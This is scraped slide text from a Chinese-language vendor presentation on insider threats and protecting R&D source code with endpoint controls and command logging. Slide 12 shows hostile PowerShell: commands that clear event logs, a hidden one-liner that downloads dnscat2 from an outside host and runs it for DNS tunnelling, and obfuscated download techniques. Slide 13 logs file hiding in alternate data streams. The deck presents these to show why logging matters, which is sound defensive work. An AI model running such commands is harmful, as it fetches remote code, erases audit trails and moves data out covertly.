[PPT] - ? FineArt - Victor Chen Top 5 PowerPoint Presentation, free download

SLIDE 1

正面迎戰內部威脅，公司被害? 還是員工被駭？

FineArt - Victor Chen

SLIDE 2

資安風險維持Top 5，資料外洩 > 網路攻擊

The Global Risks Report 2019 14th Edition

http://www3.weforum.org/docs/WEF_Global_Risks_Report_2019.pdf

風險可能性衝擊

Top 5 Global Risks in Terms of Likelihood The Global Risks Landscape 2019

SLIDE 3

情資收集者最感興趣的六大領域

2018 Foreign Economic Espionage in Cyberspace report https://www.dni.gov/files/NCSC/documents/news/20180724-economic-espionage-pub.pdf Industry Priority Sectors/ Technologies

Energy/ Alternative Energy (能源/替代能源)

Advanced pressurized

water reactor and high- temperature, gas- cooled nuclear power stations

Biofuels
Energy-efficient

industries

Oil, gas, and coalbed

methane development, including fracking

Smart grids
Solar energy technology
Wind turbines

Biotechnology (生物技術)

Advanced medical

devices

Biomanufacturing and

chemical manufacturing

Biomaterials
Biopharmaceuticals
Genetically modified
rganisms
Infectious disease

treatment

New vaccines and drugs

Defense (國防科技)

Aerospace &

aeronautic system

Armaments
Marin system
Radar
Optics

Environmental Protection (環境保護)

Batteries
Energy-efficient

appliances

Green building

materials

Hybrid and electric cars
Waste management
Water/air pollution control

Industry Priority Sectors/ Technologies

High-end Manufacturing (高端製造業)

3D Printing
Advanced robotics
Aircraft engines
Aviation maintenance and

service sectors

Civilian aircraft
Electric motors
Foundational manufacturing

equipment

High-end computer

numerically controlled machines

High-performance

composite materials

High-performance sealing

materials

Integrated circuit

manufacturing equipment and assembly technology

Space infrastructure and

exploration technology

Synthetic rubber

Information And Communications Technology (信息通信技術)

Artificial intelligence
Big data analysis
Core electronics industries
E-commerce service
Foundational software

products

High-end computer chips
Internet of thing
Network equipment
Next-generation broadband

wireless communications networks

Quantum computing and

communications

Rare-earth materials

SLIDE 4

研發部門是企業命脈，卻最難管理

SLIDE 5

研發工程師工作環境

JTag 開發板

Servers (Data / DB)

IDE Application

Source code

RJ-45

HDL Tools Simulator In-Circuit-Test CAX / EDA tool Layout Tools / PCB

DB SVN File Test

Machine R&D

SLIDE 6

SVS+SVT滿足研發開發工具之使用保護

System & DLL Network API CMD & Shell Hardware

System Call
Out Put File
Download / Upload
Tunnel / Cloud Application
Custom Protocol
CMD +
Power Shell Script
Run Executable(EXE)
Connect to Hardware Device
3rd Party Application Screen / Video

Capture

Print Image
Pip Process (IPC)

IDE Application

R&D

Key Verification Screen Capture

SLIDE 7

SVS + SVT 滿足對研發智慧財產完整保護

Prohibited/ Controlled R&D專案開發電腦可限制多種操作行為列印、PrtScr、 IPC CTRL-C + CTRL-V Controlled SVT Allowed 可正常使用 SVN、開發板可限制貼出字數

SLIDE 8

Demo 1 Visual Studio 寫出保護，系統防守

Visual Studio寫出儲存時，即受到保護 Visual Studio政策防守：Prohibited Call System 可以依據各產業別特殊工具進行防守與管控，確保智慧資產不會外洩。

SLIDE 9

指令環境下的風險，資安與稽核知多少?

SLIDE 10

IT資安與稽核應了解研發單位的應用

System & DLL Network API CMD & Shell Hardware

System Call
Out Put File
Download / Upload
Tunnel / Cloud Application
Custom Protocol
CMD +
Power Shell Script
Run Executable(EXE)
Connect to Hardware Device
3rd Party Application Screen / Video

Capture

Print Image
Pip Process (IPC)

IDE Application

R&D

Key Verification Screen Capture

SLIDE 11

OS default Function & AP IDE Call Command

3rd Party

Application

Cmd.exe
Windows PowerShell
PowerShell ISE
Call cmd.exe
Call PowerShell
Call exe
ConEmu
PSReadLine
PSGet
Chocolatey
Babun (optional)
Cmder
Git Bash by MinGW & MinTTY
WSL ubuntu on windows
Cygwin
Xshell
Console2
Powershell ise
Powershell
Dell powerGUI
Sapien Powershell studio
AWS tools for Powershell
Adam driscoll's powershell
Powershell web access,
Master-powershell
Vmware vsphere powerCLI

CMD 與PowerShell 環境分析

{ }

SDK Command

cmd軌跡記錄 SVS 安全碟軟體安控程序記錄網路行為記錄 SVT 加密通道

SLIDE 12

從小處可以一窺指令軌跡記錄的重要性

Clear-EventLog -LogName System Clear-EventLog -LogName Security Clear-EventLog -LogName Application

DNS Tunnel with PowerShell

powershell.exe -nop -w hidden -c {IEX(New-Object System.Net.Webclient).DownloadString('https://pt.cyber-redteam.info/ dnscat2- powershell/master/dnscat2.ps1’); Start-Dnscat2 -Domain dnsch.cirrus.[domain] -PreSharedSecret dnschcirrus}

PowerShell Dodge 3 ways to download files with PowerShell Code Obfuscator

–WindowStyle hidden / -w hidden –Exec Bypass –Command / -c –EncodedCommand / -e / -Enc –Nop / -Noprofile Invoke-WebRequest $url = "http://pt.cyber-redteam.info/risktest/Obfuscator.txt" $output = "$PSScriptRoot\real.ps1" $start_time = Get-Date $readteam = New-Object System.Net.WebClient $ readteam.DownloadFile($url, $output) Crunchcode (VBA) ScriptCryptor (VBA, JavaScript) CodeProtection (VBA) Vbad (VBA) Stunnix (C++, Perl, JavaScript, VBScript ) Scripts Encryptor (HTML,JavaScript/JScript, C/C++/MFC) ISESteroids(PowerShell) System.Net.WebClient −(New-object System.net.webclient).DownlodFile() −(New-object System.net.Webclient).DownloadString() Start-BitsTransfer Start-BitsTransfer -Source $url -Destination $output - Asynchronous Write-Output "Time taken: $((Get- Date).Subtract($start_time).Seconds) second(s)"

Clean all event-log

dnscat2.ps1

SLIDE 13

Demo 2 各類指令行為軌跡記錄

Invoke-Obfuscation Teensy + Alternate Data Streams (ADS)

+

記錄時間使用者帳號應用程式名稱命令內容部門名稱使用者全名電腦名稱 IP PID 伺服器儲存時間 2019/03/12 DEMO01 powershell.exe Import-Module ./Invoke-Obfusca IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5056 2019/03/12 2019/03/12 DEMO01 powershell.exe cd .\Invoke-Obfuscation-masterIT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5056 2019/03/12 2019/03/12 DEMO01 powershell.exe cd .\Desktop\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5056 2019/03/12 2019/03/12 DEMO01 powershell.exe IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5056 2019/03/12 2019/03/12 DEMO01 powershell.exe IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5056 2019/03/12 2019/03/12 DEMO01 powershell.exe cd .\Desktop\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12 2019/03/12 DEMO01 powershell.exe dir IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12 2019/03/12 DEMO01 powershell.exe cd .\user\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12 2019/03/12 DEMO01 powershell.exe dir IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12 2019/03/12 DEMO01 powershell.exe cd .\Users\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12 2019/03/12 DEMO01 powershell.exe dir IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12 2019/03/12 DEMO01 powershell.exe cd\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12 2019/03/12 DEMO01 powershell.exe copy c:\User\user\Desktop\XCons IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12 2019/03/12 DEMO01 powershell.exe cd .\user\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12 2019/03/12 DEMO01 powershell.exe cd .\Users\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12 2019/03/12 DEMO01 powershell.exe cd\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12 2019/03/12 DEMO01 powershell.exe IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12 2019/03/12 DEMO01 powershell.exe IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12 記錄時間使用者帳號應用程式名稱命令內容部門名稱使用者全名電腦名稱 IP PID 伺服器儲存時間 2019/03/12 DEMO01 CMD.exe wordpad fake.docx:AI.DOCX IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12 2019/03/12 DEMO01 CMD.exe wordpad fake.docx IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12 2019/03/12 DEMO01 CMD.exe wordpade fake.docx IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12 2019/03/12 DEMO01 CMD.exe wordpade f wordpade fake.docxIT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12 2019/03/12 DEMO01 CMD.exe dir IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12 2019/03/12 DEMO01 CMD.exe DEL AI.DOCX IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12 2019/03/12 DEMO01 CMD.exe WMIC DATAFILE WHERE DRIVEIT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12 2019/03/12 DEMO01 CMD.exe E: IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12 2019/03/12 DEMO01 CMD.exe TYPE AI.DOCX>>FAKE.DOCX:AI.IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12 2019/03/12 DEMO01 CMD.exe COPY D:AI.DOCX E: IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12 2019/03/12 DEMO01 CMD.exe COPY D:FAKE.DOCX E: IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12 2019/03/12 DEMO01 CMD.exe FORMAT E: /FS:NTFS /Q /V:ads IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12 2019/03/12 DEMO01 cmd.exe ipconfig IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 8708 2019/03/12

SLIDE 14

內部網路活動，資安有風險?

SLIDE 15

分析企業網路架構

1. 阻斷外部網路服務
2. 部分開放外部網路服務 (實體隔離)
3. 開放外部網路服務

外部網路服務內部網路服務企業組織網路型態

外部 DNS 官網外部郵件內部 DNS 主管資訊系統內部郵件其他安全防護與網路架構

各類型防火牆 VPN

雲端架構資料倉儲端點裝置分點網路架構

外部裝置

無人看管出差裝置行動裝置

VoIP WiFi

SVN CRM ERP

SLIDE 16

端點網路活動，找出風險

Role IP/Domain Channel Port Protocol Action Software Interested Time

1. 員工
2. 駭客
3. OS
4. 程序

Internet Intranet Localhost X 白名單黑名單風險目標觀察名單 X 來源/目的 Normal Proxy Tunnel SVT 白名單黑名單警示通訊埠 TCP UDP DNS 其他自訂協定拷貝/刪除更名/複製搬移檔案上傳檔案貼出文字拖拉檔案 IM FTP P2P TorNet 檔案大小檔案數量頻率規則檔案變動檔案名稱檔案Hash 上班時間下班時間半夜

人地事物時

內部網路服務

內部 DNS

主管資訊系統

內部郵件資料倉儲端點裝置

SVN CRM ERP

SLIDE 17

Takeafile & Onion Share 2.0 防守與網路記錄

阻擋所有拖曳檔案到瀏覽器禁止應用程式執行&阻擋拖曳檔案到瀏覽器

記錄網路連結行為，目的地洋蔥網路記錄網路連結行為(UDP)

https://takeafile.com/

瀏覽日期使用者帳號 IP 網址瀏覽器名稱 2019/03/12 15:54 DEMO01 192.168.218.1 http://zcekmfrons74xzuufrlhstqxcc

nionshare-gui.exe